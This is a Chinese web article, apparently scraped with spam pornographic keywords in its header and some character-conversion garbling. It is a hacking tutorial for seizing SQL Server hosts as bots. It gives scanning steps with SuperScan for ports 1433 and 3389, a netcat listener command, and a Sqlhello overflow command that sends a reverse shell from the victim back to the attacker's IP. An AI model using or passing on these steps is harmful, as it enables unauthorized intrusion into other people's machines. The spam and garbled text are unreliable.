日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

  1. 首頁(yè) > 云知道 > >

如何入侵裝有SQL數(shù)據(jù)庫(kù)的電腦主機(jī)

云知道

近些年來(lái),計(jì)算機(jī)的安全性能,曾突飛猛進(jìn)的上升勢(shì)頭 。導(dǎo)致以前網(wǎng)絡(luò),遍地都是的弱口令肉雞,現(xiàn)在早已消失的不知去向 ??梢?jiàn)其安全的提升程度,難道菜鳥(niǎo)抓取肉雞成為了“天方夜潭?當(dāng)然答案是否定的,具體如何獲取肉雞請(qǐng)看下文所示!
小提示:肉雞是指在網(wǎng)絡(luò)上,已經(jīng)被你成功入侵的主機(jī),并且這臺(tái)機(jī)器完全受控于入侵者的任意操作,如同本機(jī)操控一樣的直觀順手 。
一、踩點(diǎn)掃描——尋找目標(biāo)
【如何入侵裝有SQL數(shù)據(jù)庫(kù)的電腦主機(jī)】俗話說(shuō):知己知彼,百戰(zhàn)百勝!這里在網(wǎng)絡(luò)中攻破一臺(tái)主機(jī),也是同樣的道理,或者換句話說(shuō):擁有一款超強(qiáng)掃描的刺探工具,才是您能否走向入侵成功的關(guān)鍵 。
首先筆者從網(wǎng)上下載大名鼎鼎的SuperScan端口掃描工具(下載地址:http://www.yezIE.com/Down/list.aspx?id=109229),操作完畢后,雙擊解壓出來(lái)的“主程序圖標(biāo),彈出SuperScan工具操作界面(如圖1) 。然后在左邊“開(kāi)始IP以及STOP(結(jié)束)IP標(biāo)簽處,輸入想要查找的肉雞IP網(wǎng)段,在選取掃描的服務(wù) 。單擊右上角“端口列表設(shè)置按鈕,進(jìn)入“自定義端口窗體,在“端口標(biāo)簽處,輸入1433的端口數(shù)字,單擊“增加按鈕,編輯區(qū)就會(huì)出現(xiàn)紅色字體的1433端口,在雙擊其數(shù)字,前面會(huì)有一個(gè)"√"的標(biāo)志,證明該端口已經(jīng)添加完畢,然后在按照上一步添加端口的步驟,將3389端口也填入到其中 。在單擊“保存按鈕,選擇端口為端口列表,會(huì)順“原路返回到主界面 。在掃描類型內(nèi)選擇All selected port in list單選框,點(diǎn)擊“開(kāi)始按鈕,檢測(cè)啟動(dòng) 。稍等一會(huì)后,在所設(shè)立的網(wǎng)段中,符合要求的主機(jī),會(huì)立刻“浮現(xiàn)在下方編輯區(qū)域內(nèi) 。
圖 1
二、天羅地網(wǎng)——監(jiān)聽(tīng)端口
既然“柔弱的主機(jī),都已被掃描器“撕破了臉皮揭曉,接下來(lái)要做的就是布下“天羅地網(wǎng),等待那些含有漏洞的目標(biāo)主機(jī)“自投羅網(wǎng),布置所用的工具——瑞士軍刀NC監(jiān)聽(tīng) 。
為了方便本文以下講解,筆者已經(jīng)將其下載到本地I盤符,然后單擊“開(kāi)始菜單,選擇“運(yùn)行選項(xiàng) 。在出現(xiàn)的“打開(kāi)標(biāo)簽處,輸入CMD字符命令,并且敲擊“回車鍵,會(huì)立即彈出“命令行式對(duì)話框 。在光標(biāo)閃爍處敲入Dos跳轉(zhuǎn)命令,進(jìn)入到NC工具所在的目錄,開(kāi)始執(zhí)行該軟件所提供的監(jiān)聽(tīng)功能,這里輸入NC –v v –l –p 1987的命令回車,如果命令行下出現(xiàn)等待的“省略號(hào)提示信息(如圖2),證明已經(jīng)成功,監(jiān)聽(tīng)本機(jī)1987端口 。
;
圖 2
小提示:NC軟件里的-vv參數(shù)代表,得到更詳細(xì)的輸入監(jiān)聽(tīng)內(nèi)容 。-l代表連接端口關(guān)閉后,仍然繼續(xù)監(jiān)聽(tīng) 。-p進(jìn)行監(jiān)聽(tīng)本地端口,后跟數(shù)字就是所要監(jiān)聽(tīng)的端口號(hào) 。
三、驅(qū)趕肉雞——進(jìn)入所布下的陷阱
等待肉雞上門,自然不是聰明的辦法,更不知道何時(shí),才能有主機(jī)訪問(wèn)到本地布下的“網(wǎng)罩 。所以要使用Sqlhello攻擊工具的功能,驅(qū)趕目標(biāo)機(jī)器強(qiáng)行“重招,來(lái)加速其訪問(wèn)“陷阱的效率 。
此時(shí),將正在監(jiān)聽(tīng)的命令窗體,呈最下化模式,回到Windows圖形化操作界面 。然后在硬盤驅(qū)動(dòng)器中,找到筆者事先下載的Sqlhello溢出工具所在目錄,你會(huì)發(fā)現(xiàn)與以往工具目錄,不同的是多出一個(gè)1.BAT批處理文件,其實(shí)這是Sqlhello溢出工具的執(zhí)行臺(tái),在以“編輯選項(xiàng)的形式打開(kāi) 。輸入其格式為Sqlhello 目標(biāo)主機(jī)IP 1433 本機(jī)IP 監(jiān)聽(tīng)端口的命令(如圖3),單擊右上角“關(guān)閉按鈕,保存其文件內(nèi)容結(jié)束 。操作完畢后,再次雙擊1.BAT批處理文件,會(huì)快速的閃過(guò)DOS命令窗體,可見(jiàn)該批處理已經(jīng)操控著Sqlhello工具,開(kāi)始溢出攻擊了 。然后回到還在監(jiān)聽(tīng)的NC命令窗體,等待的省略號(hào)已經(jīng)變?yōu)榱讼到y(tǒng)的SHELL,這也正是遠(yuǎn)程主機(jī)的命令控制臺(tái) 。

推薦閱讀